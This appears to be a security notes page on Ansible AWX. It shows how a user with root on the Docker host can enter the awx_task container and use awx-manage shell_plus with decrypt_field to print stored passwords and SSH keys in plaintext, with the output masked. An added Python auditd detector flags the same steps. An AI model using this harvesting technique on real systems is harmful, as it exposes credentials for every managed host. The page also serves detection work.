
# Ansible AWX

Ansible AWX is the open-source equivalent of the commercial Ansible Tower. AWX provides a web-based user interface, REST API, and task engine built on top of [Ansible](https://github.com/ansible/ansible). It is one of the upstream projects for [Red Hat Ansible Automation Platform](https://www.ansible.com/products/automation-platform).

Ansible AWX installations come with three default Docker containers: one for the web interface, one for its database, and one for performing tasks, also known as Jobs.

One of its features is *'Credentials'*, which allows administrators to store credentials, private keys and other sensitive information that Ansible AWX uses for authentication when launching Jobs against other machines.

Ansible AWX uses SSH to connect to remote hosts (or the Windows equivalent) and no matter what type of secret (private key, password, etc.) is used, the secret needs to be decrypted before connecting to the remote host. This decrypt function can be **used maliciously to harvest all saved credentials in plaintext**.

```python
[root@victimHost ~]# docker exec -it awx_task /bin/bash
bash-4.4# awx-manage shell_plus
>>> from awx.main.utils import decrypt_field
>>> creds = Credential.objects.get(name="vSphere-01")
>>> print(decrypt_field(creds, "password"))
H************************

>>> creds = Credential.objects.get(name="admin-id_rsa")
>>> print(decrypt_field(creds, "ssh_key_data"))
-----BEGIN RSA PRIVATE KEY-----
M************************
```

> **Note:** the `name` parameter of `Credential.objects.get` refers to the `name` column. It could instead be changed to something more iterable, like `id`, for looping through and decrypting all saved credentials.
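
For detection, the two steps of the session above (a `docker exec` into `awx_task`, then an `awx-manage` interactive shell) both show up as process executions on the Docker host. The following is an added example, not part of the original notes: it assumes auditd EXECVE logging is enabled on the host, and the log lines and function names are constructed for illustration.

```python
import re

# Constructed auditd EXECVE records for illustration (not from the original page).
# auditd hex-encodes any argument that contains a space (last field of event 504).
SAMPLE_LOG = """\
type=EXECVE msg=audit(1700000001.100:501): argc=5 a0="docker" a1="exec" a2="-it" a3="awx_task" a4="/bin/bash"
type=EXECVE msg=audit(1700000009.200:502): argc=2 a0="awx-manage" a1="shell_plus"
type=EXECVE msg=audit(1700000020.300:503): argc=3 a0="docker" a1="ps" a2="-a"
type=EXECVE msg=audit(1700000031.400:504): argc=6 a0="docker" a1="exec" a2="awx_task" a3="sh" a4="-c" a5=6177782D6D616E616765207368656C6C
"""

EVENT_RE = re.compile(r'msg=audit\([\d.]+:(\d+)\)')
ARG_RE = re.compile(r'\ba(\d+)=(?:"([^"]*)"|((?:[0-9A-Fa-f]{2})+))')
# `shell_plus` is the command on the page; `shell` is Django's built-in equivalent.
MANAGE_SHELL_RE = re.compile(r'\bawx-manage\s+(?:shell_plus|shell)\b')
TASK_CONTAINER = "awx_task"  # container name used on the page; adjust per deployment


def parse_execve(line):
    """Return (event_id, argv) for an EXECVE record, or None for anything else."""
    event = EVENT_RE.search(line)
    if not line.startswith("type=EXECVE") or not event:
        return None
    args = {}
    for idx, quoted, hexed in ARG_RE.findall(line):
        args[int(idx)] = bytes.fromhex(hexed).decode("utf-8", "replace") if hexed else quoted
    return event.group(1), [args[i] for i in sorted(args)]


def classify(argv):
    """Name the step of the technique that argv matches, or None."""
    if MANAGE_SHELL_RE.search(" ".join(argv)):
        return "awx-manage interactive shell"
    if argv and argv[0].rsplit("/", 1)[-1] == "docker" and "exec" in argv and TASK_CONTAINER in argv:
        return "docker exec into awx_task"
    return None


def detect(log_text):
    """Return (event_id, reason, argv) for every EXECVE record worth alerting on."""
    hits = []
    for line in log_text.splitlines():
        parsed = parse_execve(line)
        reason = classify(parsed[1]) if parsed else None
        if reason:
            hits.append((parsed[0], reason, parsed[1]))
    return hits


if __name__ == "__main__":
    for event_id, reason, argv in detect(SAMPLE_LOG):
        print(f"event {event_id}: {reason}: {argv}")
```

Administrators also run these commands for maintenance, so a match is a prompt to check who ran it and why, not proof of credential theft.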


